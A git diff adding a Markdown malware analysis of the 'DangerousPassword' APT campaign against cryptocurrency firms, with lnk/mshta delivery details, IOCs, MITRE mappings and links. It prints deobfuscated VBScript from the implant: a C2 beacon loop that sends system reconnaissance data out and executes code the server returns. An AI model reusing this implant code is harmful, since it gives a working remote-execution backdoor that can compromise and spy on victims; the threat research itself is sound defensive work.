diff --git a/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md b/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md new file mode 100644 index 0000000..0e7f89f --- /dev/null +++ b/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md @@ -0,0 +1,480 @@ +## Dangerous Password +## Table of Contents +* [Malware analysis](#Malware-analysis) +* [Cyber kill chain](#Cyber-kill-chain) +* [Indicators Of Compromise (IOC)](#IOC) +* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK) +* [Links](#Links) + + [Original Tweet](#tweet) + + [Link Anyrun](#Links-Anyrun) + + [Articles](#Articles) + +

Malware analysis

+
The initial vector is a executable RAR archive content a edited lnk, this writes the file in the temp folder and executes the remote code by mshta call.
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
MachineIDIconFileNameCommandLineArgumentsWorkingDirectoryLocalBasePathTargetFileDOSNameTargetFileSizeCreateDateModifyDateFileAttributes
desktop-mn3id9C:\Windows\System32\shell32.dll/c start /b %SystemRoot%\System32\mshta https[:]//bit.ly/2UiZH6VC:\Users\Public\Music\C:\Windows\System32\cmd.execmd.exe2800642020-02-14 15:47:41 (+01:00)2020-02-14 15:47:41 (+01:00)Archive
+ +
The bitly link redirects to a fake cloud solution which usurps a legitim service. (.club instead of .fr)
+ +```html + +Bitly +moved here + +``` + + +
This executes a following Visual Basic code, the first two functions for decode the base 64 and create a stream object for manipulate data.
+ +```vb + +``` + +###### Once decoded and deobfuscated, we can see this check if pushed argument exists before launch the script, this essential due to the URL to contact is pushing in argument. This use random call for get a random number for add a random suffix with ```?topic=sXXXXX```. On the site, whatever the URL, this redirects on another code to execute. + +```vb +on error resume next +randomize +if WScript.Arguments.Length>0 then + url="http://"&WScript.Arguments.Item(0) + set whr=CreateObject("WinHttp.WinHttpRequest.5.1") + do while true + rtc="" + tpc=url&"?topic=s"&Int(1000*rnd+9000) + whr.Open "POST",tpc,false + whr.Send "200" + if whr.Status=200 Then + rtc=whr.ResponseText + end if + if rtc<>"" then + Execute(rtc) + exit do + end if + WScript.Sleep 180000 ' 50 min + loop +end if +``` + +
The new bitly link redirect to a new domain witch usurp the Microsoft update domain, this load in memory the Visual Basic code to execute
+ +```html + +Bitly +moved here + +``` + +
The first three functions of the code is for parse the code send by the C2 to execute on the PC, decode with base 64 and xor the code.
+ +```vb +on error resume next +function NStep(cmd) + n=0 + t=0 + NStep="" + ret="" + n=InStr(1,cmd,"#") + sUri=Mid(cmd,n+1,Len(cmd)-n) + uri=sUri&"?topic=v"&CStr(randID())&"&session="&uID + do while 1>0 + ret=uget(uri) + if ret="" then + if t=10 then + exit function + end if + t=t+1 + else + exit do + end if + WScript.Sleep 60*1000 + loop + n=InStr(1,ret,"#") + k=CLng("&h" & Mid(ret,1,n-1)) + psc=Mid(ret,n+1,Len(ret)-n) + sc=bdec(psc) + psc=CStr(xdec(sc,k)) + NStep=bdec(psc) +end function +function bdec(c) + on error resume next + const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" + dim dataLength, sOut, groupBegin + c = Replace(c, vbCrLf, "") + c = Replace(c, vbTab, "") + c = Replace(c, " ", "") + dataLength = Len(c) + if dataLength Mod 4 <> 0 then + exit function + end if + for groupBegin = 1 to dataLength step 4 + dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut + numDataBytes = 3 + nGroup = 0 + for CharCounter = 0 to 3 + thisChar = Mid(c, groupBegin + CharCounter, 1) + if thisChar = "=" then + numDataBytes = numDataBytes - 1 + thisData = 0 + else + thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 + end if + if thisData = -1 then + exit function + end if + nGroup = 64 * nGroup + thisData + next + nGroup = Hex(nGroup) + nGroup = String(6 - Len(nGroup), "0") & nGroup + pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + pOut = pOut & Chr(CByte("&H" & Mid(nGroup, 3, 2))) + pOut = pOut & Chr(CByte("&H" & Mid(nGroup, 5, 2))) + sOut = sOut & Left(pOut, numDataBytes) + next + bdec = sOut +end function +function xdec(input, pkey) + xdec="" + for i=1 to Len(input) + xdec=xdec+chr(asc(mid(input, i, 1)) Xor pkey) + next +end function +``` + +
The three next functions use WMI requests for getting more informations about the system.
+ +```vb +function getUName() + getUName="" + set ObjWMI=GetObject("winmgmts:\\.\root\CIMV2") + set colItems=ObjWMI.ExecQuery("SELECT * FROM Win32_ComputerSystem",,48) + for each objItem in colItems + if not IsNull(objItem.UserName) then + getUName=objItem.UserName + end if + next +end function +function getProc() + on error resume next + set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") + set prclst = objWMIService.ExecQuery ("Select * from Win32_Process") + for each prc in prclst + if InStr(1,prc.Name,"svchost",1)=0 And prc.ProcessID <> 0 And prc.ProcessID <> 4 then + getProc=getProc+ent+CStr(prc.ProcessID)+tab+CStr(prc.SessionID)+tab + if IsNull(prc.CommandLine) then + getProc=getProc+prc.Name + else + getProc=getProc+prc.CommandLine + end if + end if + next +end function +function getInfo() + on error resume next + set ObjWMI=GetObject("winmgmts:\\.\root\CIMV2") + set osItems = ObjWMI.ExecQuery("Select * from Win32_OperatingSystem") + set wdate=CreateObject("WbemScripting.SWbemDateTime") + for each item In osItems + on error resume next + getInfo=getInfo&"Hostname:"+tab+item.CSName+ent + getInfo=getInfo&"OS Name:"+tab+item.Caption+" "+item.OSArchitecture+ent + getInfo=getInfo&"OS Version:"+tab+item.Version+ent + if not IsNull (item.InstallDate) then + wdate.Value=item.InstallDate + getInfo=getInfo + "Install Date:"+tab+GetFormattedDate(wdate.GetVarDate(true))+ent + end if + if not IsNull(item.LastBootUpTime) then + wdate.Value=item.LastBootUpTime + getInfo=getInfo + "Boot Time:"+tab+FormatDateTime(wdate.GetVarDate(true))+ent + end if + next + set csItems=ObjWMI.ExecQuery("SELECT * FROM Win32_ComputerSystem") + set tzItems=ObjWMI.ExecQuery("SELECT * FROM Win32_TimeZone") + + for each item in csItems + cTZ=item.CurrentTimeZone + next + for each tzitem in tzItems + UtcName=tzitem.StandardName + next + timezone ="(UTC " + CStr(cTZ/60) +" hours) " +UtcName + getInfo=getInfo+"Time Zone:"+tab+timezone+ent + set cpuItems=ObjWMI.ExecQuery( "SELECT * FROM Win32_Processor") + for each item in cpuItems + select case item.Architecture + case 0 cpuArch="x86" + case 6 cpuArch="Itanium" + case 9 cpuArch="x64" + case else + cpuArch="Unknown" + end select + getInfo=getInfo+"CPU:"+tab+tab+item.Name+" (" + cpuArch + ")"+ent + next + + getInfo=getInfo + "Path: "+tab+WScript.ScriptFullName+ent+ent + + set adapItems=ObjWMI.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration",,48) + for each adapter in adapItems + on error resume next + if isNull(adapter.IPAddress) then + else + getInfo=getInfo+"Network Adapter:"+tab&adapter.Description+ent + getInfo=getInfo+" MAC Address:"+tab&adapter.MACAddress + ent + getInfo=getInfo+" IP Address:"+tab+Join(adapter.IPAddress, ",") + ent + getInfo=getInfo+" Subnet Mask:"+tab+Join(adapter.IPSubnet, ",") + ent + getInfo=getInfo+" Default Gateway:"+tab+Join(adapter.DefaultIPGateway, ",") + ent + if adapter.DHCPEnabled=true then + getInfo=getInfo+" DHCP Servers:"+tab&adapter.DHCPServer + ent + end if + getInfo=getInfo+" DNS Server:"+tab+Join(adapter.DNSServerSearchOrder, ",") + ent + end if + next +end function +``` + +
The next functions are used for randomizing the ID and session and format the date to string.
+ +```vb +function rand() + randomize + rand=Int(90000000*rnd)+10000000 +end function +function randID() + randomize + randID=Int(1000*rnd) +end function +function GetFormattedDate (sDate) + strDate = CDate(sDate) + strDay = DatePart("d", strDate) + strMonth = DatePart("m", strDate) + strYear = DatePart("yyyy", strDate) + if strDay < 10 then + strDay = "0" & strDay + end if + if strMonth < 10 then + strMonth = "0" & strMonth + end if + GetFormattedDate = strMonth & "/" & strDay &"/" &strYear +end function +``` +
The last functions are used for sending the informations founded to the C2 and receive the reply of the C2.
+ +```vb +function post(u,content) + on error resume next + set hReq=CreateObject("MSXML2.XMLHTTP") + ul=u & "&isbn=" & (timer()*100) + hReq.Open "POST", ul, false + hReq.Send content + if hReq.Status=200 then + post=hReq.responseText + end if +end function +function uget(u) + on error resume next + set hrq=CreateObject("MSXML2.XMLHTTP") + ul=u & "&id=" & (timer()*100) + hrq.Open "GET", ul, false + hrq.Send + if hrq.Status=200 then + uget=hrq.responseText + end if +end function +``` + +
The main code launches the recon action on the system and format for request in clear the informations to the C2, in function of the response of the C2, this executes commands on the system, in clear or with base 64 + substrings operations as obfuscation.
+ +```vb +set sh=CreateObject("wscript.Shell") +ent=Chr(13)+Chr(10) '\n +tab=Chr(9) '\t +uID=CStr(rand()) +if WScript.Arguments.Length>1 then + uID=uID&WScript.Arguments.Item(1) +end if +if WScript.Arguments.Length>0 then + uu="http://"&WScript.Arguments.Item(0) +end if +sData=getInfo() +if IsNull(sData) then + sData="" +end if +sData="Username:"+tab+getUName()+ent+sData +sUri="" +url=uu+"?topic=v"+CStr(randID())+"&session="+uID +do while 1>0 + psc="" + curDate = "Current Time:"&tab&Date&" "&Time + pl=getProc() + pData=curDate+ent+sData+ent + if not IsNull(pl) then + pData=pData+pl + end if + res=post(url,pData) + if InStr(1,res,"20#")<>0 then + psc=NStep(res) + if psc<>"" then + Execute(psc) + exit do + end if + elseif res="21" then + exit do + elseif InStr(1,res,"23#")<>0 then + nps=InStr(1,res,"#") + Execute(bdec(Mid(res,nps+1,Len(res)-nps))) + end if + WScript.Sleep 60*1000 +loop +``` + +
We can list the codes used for the communications to the C2 and implant :
+
Note : # is a wildcard in VBA for matches with any digit character
+ + + + + + + + + + + + + + + + + + + + + + +
CodeDescription
20#Execute commands in clear
21Exit Session
22OK received informations (debug commands)
23#Execute commands with base 64 + substrings operations as obfuscation
+ + +
We can see on the informations send in clear to the C2 that the list of informations rest the same since mid 2019 :
+ +``` +Current Time: 3/31/2020 3:31:37 AM +Username: USER-PC\admin +Hostname: USER-PC +OS Name: Microsoft Windows 7 Professional 32-bit +OS Version: 6.1.7601 +Install Date: 10/05/2017 +Boot Time: 3/31/2020 12:28:48 AM +Time Zone: (UTC 1 hours) GMT Standard Time +CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz (x64) +Path: C:\Users\admin\AppData\Local\Temp\iilbat.vbs +Network Adapter: Intel(R) PRO/1000 MT Network Connection + MAC Address: [MAC] + IP Address: 192.168.X.X,[MAC] + Subnet Mask: 255.255.255.0,64 + Default Gateway: 192.168.X.X + DNS Server: 192.168.X.X +264 0 smss.exe +344 0 csrss.exe +380 0 wininit.exe +388 1 csrss.exe +428 1 winlogon.exe +472 0 services.exe +484 0 lsass.exe +492 0 lsm.exe +1188 0 spoolsv.exe +1364 0 IMEDICTUPDATE.EXE +1428 0 qemu-ga.exe +1968 1 "taskhost.exe" +1984 1 taskeng.exe {DE21909D-DEE6-419E-AF8D-D6899DCE61F7} +2044 1 "C:\Windows\system32\Dwm.exe" +372 1 C:\Windows\Explorer.EXE +652 1 C:\Windows\System32\ctfmon.exe +1120 0 SearchIndexer.exe +1932 1 "windanr.exe" +2736 1 "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar" +1720 1 "C:\Windows\System32\cmd.exe" /C "ECHO risk2020>C:\Users\admin\AppData\Local\Temp\Password.txt&NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txt&DEL C:\Users\admin\AppData\Local\Temp\Password.txt" +3020 1 \??\C:\Windows\system32\conhost.exe "1233334231726783925-1766655123-1154929739-1178529684175521206-10630235841853906928 +680 1 NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txt +588 0 WmiPrvSE.exe +3292 1 wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 1 +3284 1 wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 2 +``` + +
According with the analysis of the Japanese CERT (June 2019), the list is the same :
+ + +
On the opendir, like the last observations on the group, legit VNC binaries can be found, this indicates that the group have kept the same TTPs for the extraction of the data. This high probable that the group do manual actions for reduce the security measures and execute the tools for obtain the data on the crypto-occurencies.
+ +
China doesn't recognize cryptocurrencies as legal tender and the banking system isn't accepting cryptocurrencies or providing relevant services for trading in place since September 2017. The Chinese government has recently promoted a law facilitating the transition to the exchange of a virtual currency led by the state, this change explained why since the campaign of January, China is now in the focus of the Asian countries targeted by the group (the announcement also caused an increase in bitcoins and these derivative currencies). The TTPs of the group are the same since mid 2019 and rest focus on the steal of the crypto-occurencies.
+ +

Cyber kill chain

+
This process graph represent the cyber kill chain used by the attacker.
+

+ +

+

Indicators Of Compromise (IOC)

+
The IOC can be exported in JSON and CSV
+ +

References MITRE ATT&CK Matrix

+ +|Enterprise tactics|Technics used|Ref URL| +| :---------------: |:-------------| :------------- | +|Execution|Command-Line Interface
Scripting
Mshta|https://attack.mitre.org/techniques/T1059/
https://attack.mitre.org/techniques/T1064/
https://attack.mitre.org/techniques/T1170/| +|Defense Evasion|Scripting
Install Root Certificate
Mshta|https://attack.mitre.org/techniques/T1064/
https://attack.mitre.org/techniques/T1130/
https://attack.mitre.org/techniques/T1170/| +|Discovery|Query Registry|https://attack.mitre.org/techniques/T1012/| + +
This can be exported as JSON format Export in JSON
+ +

Links

+
Original tweet:
+ +* [https://twitter.com/Rmy_Reserve/status/1244817235211739141](https://twitter.com/Rmy_Reserve/status/1244817235211739141) + +
Links Anyrun:
+ +* [https://app.any.run/tasks/67ebd848-26f8-4cb3-9a1f-8ff4f3a0c12e](3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar) + +
Articles
+ + + [Spear Phishing against Cryptocurrency Businesses](https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html) + + [[Chinese]The Nightmare of Global Cryptocurrency Companies: Demystifying APT Group's "Dangerous Passwords"](https://www.secrss.com/articles/16505) + + [China Enacts Crypto Law in Run-Up to State Digital Currency Debut ](https://cointelegraph.com/news/china-enacts-crypto-law-in-run-up-to-state-digital-currency-debut) +